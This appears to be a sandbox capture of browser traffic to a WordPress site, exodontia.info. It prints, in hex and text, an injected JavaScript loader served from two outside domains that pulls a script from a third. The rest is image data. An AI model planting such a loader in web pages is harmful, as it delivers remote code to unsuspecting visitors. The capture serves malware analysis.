                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:10 UTC165INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:09 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:14:10 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                      2024-04-24 10:14:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      118192.168.2.164987531.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:07 UTC523OUTGET /9hFXWz7m HTTP/1.1
                                                                                                                                      Host: debasesingle.life
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:07 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:07 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:07 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9eei; expires=Sat, 25 May 2024 10:14:07 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ3MTdcIjoxNzEzOTUzNjQ3LFwiNDY4NlwiOjE3MTM5NTM2NDcsXCI0Njc4XCI6MTcxMzk1MzY0N30sXCJjYW1wYWlnbnNcIjp7XCIxNDVcIjoxNzEzOTUzNjQ3LFwiMjI5XCI6MTcxMzk1MzY0NyxcIjIyOFwiOjE3MTM5NTM2NDd9LFwidGltZVwiOjE3MTM5NTM2NDd9In0.08CB8NfIyNR1pns9OkwW6uUsNwodz8VqBDfqwLyn6Zg; expires=Fri, 19 Aug 2078 20:28:14 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:07 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      119192.168.2.164987631.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:07 UTC518OUTGET /SDQxw16j HTTP/1.1
                                                                                                                                      Host: gspiceyl.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:08 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:07 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:07 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9eel; expires=Sat, 25 May 2024 10:14:07 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ2OThcIjoxNzEzOTUzNjQ3LFwiNDY4NlwiOjE3MTM5NTM2NDcsXCI0Njc4XCI6MTcxMzk1MzY0N30sXCJjYW1wYWlnbnNcIjp7XCIyMDdcIjoxNzEzOTUzNjQ3LFwiMjI5XCI6MTcxMzk1MzY0NyxcIjIyOFwiOjE3MTM5NTM2NDd9LFwidGltZVwiOjE3MTM5NTM2NDd9In0.u-mTXfctOsKF9Aq1lazVKj6rlZVBabjaOwwfeJ_Q6q8; expires=Fri, 19 Aug 2078 20:28:14 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:08 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      120192.168.2.1649886153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:10 UTC824OUTGET /wp-content/uploads/2021/06/ExodoniaBWML.png HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
                                                                                                                                      2024-04-24 10:14:11 UTC579INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:11 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:21 GMT
                                                                                                                                      etag: "ba-64623fe1-b56b6ec015d665dc;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 186
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:11 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:11 UTC186INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 23 08 06 00 00 00 8e ca ca 96 00 00 00 81 49 44 41 54 78 da 63 f8 ff ff 3f 03 2d 31 c3 f0 b1 40 40 2f 64 21 10 ff a7 16 6e 9f b6 32 76 d4 02 aa 59 f0 0e 88 ef 92 8a 81 16 04 10 65 01 50 61 3d b9 29 68 d4 82 51 0b 20 d8 3b a9 6e 1d d0 92 58 22 b1 35 ad cb a2 85 a3 16 50 df 02 60 24 ef 07 a5 24 22 71 c0 e0 4b a6 a3 16 8c 5a 30 04 2c 80 95 a6 a4 e2 c3 a7 ae 28 0d 9a 66 cb a8 05 10 0b 40 25 21 10 d7 53 0b 03 23 59 8f 2e fd 03 00 65 ad 87 b1 c3 8d 2d 56 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDR#IDATxc?-1@@/d!n2vYePa=)hQ ;nX"5P`$$"qKZ0,(f@%!S#Y.e-VIENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      121192.168.2.1649887153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:10 UTC908OUTGET /wp-content/uploads/2021/06/shutterstock_1642040905-scaled.jpg HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/wp-content/uploads/themify-concate/826651810/themify-157411406.css
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
                                                                                                                                      2024-04-24 10:14:11 UTC586INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:11 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:33 GMT
                                                                                                                                      etag: "59b51-64623fed-2c4ce463ef088f5e;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 367441
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:11 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:11 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0e 09 09 08 08 09 12 0d 0d 0a 0e 15 12 16 16 15 12 14 14 17 1a 21 1c 17 18 1f 19 14 14 1d 27 1d 1f 22 23 25 25 25 16 1c 29 2c 28 24 2b 21 24 25 24 ff c0 00 0b 08 05 46 0a 00 01 01 11 00 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 3e 10 00 02 02 01 04 01 04 01 03 04 02 02 01 02 01 0d 01 02 00 11 03 04 12 21 31 41 05 13 22 51 61 06 32 71 14 23 81 91 42 a1 15 b1 52 07 33 62 c1 16 24 d1 e1 72 34 43 53 f0 f1 82 25 ff da 00 08 01 01 00 00 3f 00 fa 46 7c f4 d4 4f 1e 38 81 c7 f2 62 40 b8 0c e8 17 9a e4 c5 32 e6 d8 39 ab f1 11 7c cc 5a a1 31 66 2b df f1 1a 19 16 b8 6b 35 f5 11 7c e7 23 90 0f
                                                                                                                                      Data Ascii: JFIF,,C!'"#%%%),($+!$%$F>!1A"Qa2q#BR3b$r4CS%?F|O8b@29|Z1f+k5|#
                                                                                                                                      2024-04-24 10:14:11 UTC16384INData Raw: bf db 42 07 3c 4f 9c fa 96 56 4d 4b 6e be 7e a6 2e af 52 e5 80 04 91 70 d9 f1 e3 f6 71 92 c0 31 e6 a5 b5 1a 8c 78 b4 e0 ef dd 53 3f 57 ea 6c 40 0a c4 48 6d 5e dc 3f 2e 58 8e e2 99 33 96 b3 c8 13 1b 59 ea 15 90 aa 9d bf 98 8e 4f 50 7b 3f 3b 03 a1 12 c9 ac c8 cf bb c4 06 6c c1 ae 85 93 28 ad f2 00 75 e6 3a ae cd b4 08 d6 3f 4f 6c 88 4b 11 5d 98 ae a3 47 46 87 f8 31 53 85 ac 82 6c 09 29 a7 db fc 18 c6 3d 35 71 63 9e e1 14 6d 14 0d 9f cc 22 ab ee 1d 4b 7f 4a d9 5c 31 ae e6 8e 25 0c 9e d2 0e be a5 94 9c 41 83 55 c9 4d 42 6e 16 bf e6 5d 72 0a ef cc 2a 3b 80 6c f0 79 10 d8 93 23 a5 a9 eb c4 2a 33 bb 02 29 76 c3 bd 93 bf b9 da 75 dc 4b 91 c7 91 1c c5 85 56 9c 35 03 d4 b2 69 d8 b3 12 c3 f1 06 51 70 06 f7 32 d1 30 0c c9 8d ac e5 e0 c1 e4 d5 62 07 7d ee a8 ae a7 5b
                                                                                                                                      Data Ascii: B<OVMKn~.Rpq1xS?Wl@Hm^?.X3YOP{?;l(u:?OlK]GF1Sl)=5qcm"KJ\1%AUMBn]r*;ly#*3)vuKV5iQp20b}[
                                                                                                                                      2024-04-24 10:14:11 UTC16384INData Raw: 11 4c 04 b6 16 c6 dc 8b ff 00 53 27 55 88 26 46 04 f2 7a 89 32 02 76 df 62 2e 31 15 6d b2 19 0a 31 b9 5c cc 88 9b 7e fb 99 9a 8c a0 5a a8 e2 35 e9 aa 3d c5 23 b9 b3 99 d7 69 07 c7 99 9a ce 79 2a c6 bc ca e6 25 85 ef 17 f5 15 4c cf 8f 27 c7 91 18 4c c7 23 82 6e fc c6 f1 ea 48 60 0a df e6 32 18 65 3f 16 fe 67 0c be c2 9a 00 b4 91 a8 5f f9 79 9d 8b 32 fb 9f 12 3f 88 7c ad 8c a8 2c 68 ca 7b aa 12 c3 d8 fc c0 26 a9 57 2d 31 e3 ff 00 70 d8 f5 8a 1c a3 11 b6 19 fd a2 bb d0 d1 f1 10 ca 32 2d 92 6e fc c5 86 a1 d4 15 7b 22 72 ea 1b 1f 80 49 91 8f 2f b9 68 e2 ea 3a 33 01 89 55 47 53 99 37 13 64 03 09 a4 51 65 18 d8 31 f4 d2 0c 4e ac 1a ee 68 60 cc a5 68 9b 37 34 57 46 9a 85 0c bc 19 a3 a7 d0 15 08 54 dd 7d cd ac 58 0a d0 60 02 91 2e f8 ed 49 bb 02 2a f8 43 f2 2e c4
                                                                                                                                      Data Ascii: LS'U&Fz2vb.1m1\~Z5=#iy*%L'L#nH`2e?g_y2?|,h{&W-1p2-n{"rI/h:3UGS7dQe1Nh`h74WFT}X`.I*C.
                                                                                                                                      2024-04-24 10:14:11 UTC16384INData Raw: 49 3f c9 81 c9 92 8a 80 d0 ab 98 06 5d ed 62 33 9b 51 89 14 01 92 c5 75 13 cf a8 5c cb 57 c4 cc d5 eb 15 19 42 9e a2 99 b3 86 60 49 e6 a6 66 52 4e 4e 3b 30 3a 8b 41 4e 2e e2 c5 b1 6d a3 11 cc aa 58 ed 06 be e7 2a 0c 60 1d d7 3b 17 b6 58 a1 c7 77 d9 12 ab a5 50 ec 6c ec 12 d9 b3 63 60 17 12 dd 0e e2 61 41 b1 7c c9 da 00 ba e4 4b 36 31 c5 9e 4c 93 80 a8 dc 4f 10 42 9d b6 ed ee 37 a5 d0 22 fc d8 86 03 c4 26 a1 cf 03 6e d5 fc 4e c1 8d 99 c1 00 f3 d4 6f 0a 8b 62 cb f2 11 cf 4f cc 72 67 db d0 33 d3 69 35 3e db 6c 23 83 29 fa 81 2f 49 c0 1c f7 f7 3c a6 5d ab 8c 59 04 fd 41 86 1b 48 2d c7 d0 90 99 80 c7 c7 83 d4 06 4d 46 f0 42 dd f9 fa 94 0e 31 10 c5 bb f1 05 9b 54 a3 25 b5 1b f1 33 75 5a 9d cd 6b e2 68 7a 5e a2 d3 75 cd 1c 5a 8c 88 03 02 7b e2 e6 de ab 56 d9 3d
                                                                                                                                      Data Ascii: I?]b3Qu\WB`IfRNN;0:AN.mX*`;XwPlc`aA|K61LOB7"&nNobOrg3i5>l#)/I<]YAH-MFB1T%3uZkhz^uZ{V=
                                                                                                                                      2024-04-24 10:14:11 UTC16384INData Raw: e8 c7 b1 e9 db 18 8d cc 78 10 87 48 da 71 6e 41 dc 3b 33 b4 f9 59 7e 1d 8b 91 ac cb 84 69 dc b0 f9 f8 99 58 b3 36 3c ea e7 90 66 96 26 5c 99 45 28 a3 3d 5f a7 61 0f a1 60 17 e5 e2 68 60 f4 ed 56 5c 7b 9d 48 51 f7 3d 07 e9 96 38 c3 e0 70 7f 11 fc 9a 21 97 28 77 04 10 62 de bd e8 ba 6c b8 d3 3b 05 05 7c cf 15 ea 3a 8c 18 15 d8 38 bb ad a2 66 6b 75 69 97 0a 05 14 2a 57 0e 3c 29 b5 b2 fc 49 e6 17 16 a4 62 f5 04 dc df 1f 1c cd 8f 51 d6 a0 01 85 6e af 13 2b 1f a9 64 67 a0 58 01 e6 53 3f ea 4c b8 1b 69 00 83 e4 ca e3 f5 8c 9a 96 dc 72 d2 8f 10 59 fd 5f 16 a0 be 31 90 ab 0e 8c 0e 94 38 5f 74 64 2c 41 fb ee 76 5f 5a d5 e4 ca 31 2b 11 e2 a3 48 33 b1 05 dc ff 00 be 63 1a 7c f8 bd c0 85 79 1e 4c 6b 50 f8 85 af 82 39 11 7c 5a 0c 3a b6 ac 6b 40 47 86 87 16 1c 65 54 06
                                                                                                                                      Data Ascii: xHqnA;3Y~iX6<f&\E(=_a`h`V\{HQ=8p!(wbl;|:8fkui*W<)IbQn+dgXS?LirY_18_td,Av_Z1+H3c|yLkP9|Z:k@GeT
                                                                                                                                      2024-04-24 10:14:12 UTC16384INData Raw: ab 75 0f a7 d3 be a3 59 64 6d a9 e9 f0 e2 38 c2 55 19 bf e9 c5 59 ad 57 91 d9 9a ee 83 1e 12 cc 6e e7 95 f5 62 87 33 6d ec 77 3c 9f aa ea 0e 35 ca a8 38 1f 53 c9 e7 d6 33 d8 17 b4 f7 13 63 93 23 15 54 ae 3f dc 0e f2 49 42 94 c4 54 ef 61 b1 e3 20 8b b8 b8 4c a7 1b 72 6a 46 5c 5b 36 ae e3 b8 cb 0c 85 31 6d ab 7f b8 ce 3d 42 e1 d2 31 c8 bf 26 ea 64 be 75 77 dc 3e e6 f7 a4 e1 5c ce 32 30 b5 a9 ad a8 d4 27 b0 31 b1 50 df f1 99 9a fd 53 a1 c6 8c d6 25 b3 66 f6 c6 22 b4 3f 22 03 d4 b5 28 c1 05 db b7 66 67 ea 32 56 32 17 96 22 a6 06 a7 46 1b 21 35 b8 99 8b a8 d3 e3 c2 18 31 f9 5f 52 d8 b1 62 7c 7b 58 df 13 27 32 32 3b 28 ba 06 13 45 8d ce 40 47 13 50 a8 c2 d6 57 93 d4 06 54 39 98 fc 6a e2 f9 b4 cd 86 df c4 54 b1 03 f9 9c 10 20 dc 4d dc 9d c4 70 0c a9 61 b7 f3 22
                                                                                                                                      Data Ascii: uYdm8UYWnb3mw<58S3c#T?IBTa LrjF\[61m=B1&duw>\20'1PS%f"?"(fg2V2"F!51_Rb|{X'22;(E@GPWT9jT Mpa"
                                                                                                                                      2024-04-24 10:14:12 UTC16384INData Raw: e0 19 e0 bd 55 37 12 c7 e3 e2 61 ea 31 6d c7 f0 71 d7 31 54 0c 47 7d f9 96 5d e3 37 c4 dd 4d 9d 16 a8 32 84 c8 d4 41 ee 7a 3d 37 b4 e8 b9 03 51 03 98 e6 cf 71 06 c6 e0 f7 27 36 2b 55 0b 45 ba 82 c8 a8 00 25 8b 3f 55 15 7c 44 06 be 09 ff 00 a8 b9 c7 4b 60 93 7c 13 2b 93 19 25 40 63 50 89 8c ec 20 1f e6 57 08 75 72 b8 da a7 16 70 08 ba fb 32 a8 ef 8d fe 32 55 99 b2 93 ff 00 70 1a a6 61 96 af 70 80 3a dc 88 c2 c7 03 a1 04 72 e7 dc 59 88 e6 11 72 e5 c8 9c bd d7 71 9d 3e bb 26 0c 64 15 05 47 3c c5 75 7e a0 75 4e 09 5d aa 3e a5 f1 6b d3 16 23 bb 92 07 17 12 c5 98 e6 c8 59 c7 1f 98 3d 59 46 c8 69 f6 d4 5f 6a ba 5b 10 47 93 12 cf 94 72 97 b9 3f 10 2e 31 80 0a 35 ff 00 f8 7e a0 32 95 20 8a e7 ee 2b 97 08 ca df bb 6d 08 37 c0 7d b0 28 5f dc a9 c2 8a a5 0f ee 3c dc
                                                                                                                                      Data Ascii: U7a1mq1TG}]7M2Az=7Qq'6+UE%?U|DK`|+%@cP Wurp22Upap:rYrq>&dG<u~uN]>k#Y=YFi_j[Gr?.15~2 +m7}(_<
                                                                                                                                      2024-04-24 10:14:12 UTC16384INData Raw: e2 0b db 77 1b 4b 50 1e 60 32 6e 3c 0e 87 10 2e 00 35 64 c8 7c 61 4f 26 c7 83 21 f1 d2 ab 07 b3 f5 04 ca e4 73 c8 b9 ce 98 c0 1c f6 20 76 1d 9f 89 42 a0 81 d0 a8 1c 98 08 25 b8 3f 88 bb e3 04 58 00 11 07 91 aa be 3f 88 07 52 49 f1 17 c8 29 80 81 65 05 ae 50 a1 66 a9 05 0a d8 bf e6 46 de 84 82 3c 7d 4e 18 fc 88 c6 9f 40 f9 9e db a9 af a4 f4 d5 ae 16 68 a6 8a 80 15 51 ec 3a 05 48 d6 2d 19 2d c0 8f e9 f4 60 f1 53 53 4b a2 dc c4 b7 ed 11 ec 1a 11 b8 b0 51 b4 4b 9c 5b 51 bc 41 60 c7 97 dd 0c c4 c7 4e e2 eb c6 e3 2a ea c0 94 23 bf fa 9a 7a 1d 00 5d 37 ba 68 9f cc 26 5c a1 42 80 3e 50 7a 84 21 6c 80 3e e2 38 80 76 63 bb 6d 44 b5 e1 5e c7 d0 fb 95 f4 b4 c4 41 2c 2e a6 d6 95 56 b7 2f 15 d4 6b 1b fb af 79 39 a8 5c b9 c1 00 20 20 0f 3f 72 41 0d c2 bd 49 0a 15 c1 39
                                                                                                                                      Data Ascii: wKP`2n<.5d|aO&!s vB%?X?RI)ePfF<}N@hQ:H--`SSKQK[QA`N*#z]7h&\B>Pz!l>8vcmD^A,.V/ky9\ ?rAI9
                                                                                                                                      2024-04-24 10:14:12 UTC16384INData Raw: c5 ea 7b 32 6d 74 dc 07 10 1e a6 c4 67 5d 82 bd cf b9 93 ea 39 db 0b 0c 78 cd 37 9a 8a fa 5a b6 af d5 31 ee 3d 19 eb bf a7 70 e4 76 7a 13 43 43 a3 f6 d7 e5 c9 26 6b 2e 98 38 01 01 b1 2c 70 65 dc 10 83 52 1c 10 85 54 51 3c 40 61 d2 b6 fb 6a a3 09 93 d3 c0 b2 a4 73 e6 50 e2 3b 46 32 bc 8f f9 46 74 b8 76 57 c8 13 1b cb 80 28 0c 0f 27 c0 94 4f 83 ee 2b e2 57 57 a9 3a 8c 5b 42 00 3a 98 d9 f4 ac ea 4f 81 02 be 9e 32 b5 33 71 0d 87 4e 34 ee 02 89 99 fa ab 0e f7 c4 54 73 5c cc 4d 3e 0d ce ab d9 b9 e9 32 69 d7 4f a4 c7 40 02 63 be 9d a5 c8 89 ee 0f dc 79 91 ea 47 2e 56 00 9e a5 31 3b 60 c4 29 3f 77 99 a7 83 1b b8 40 a3 9a e6 07 56 cc 99 bd ba f3 dc 43 d5 b2 3a e3 60 01 1f 1e e7 88 62 72 e5 72 4f 37 52 99 34 2a c1 83 1f 97 62 53 45 8f 2b 66 08 3c 4b 7a 86 20 5f 61
                                                                                                                                      Data Ascii: {2mtg]9x7Z1=pvzCC&k.8,peRTQ<@ajsP;F2FtvW('O+WW:[B:O23qN4Ts\M>2iO@cyG.V1;`)?w@VC:`brrO7R4*bSE+f<Kz _a
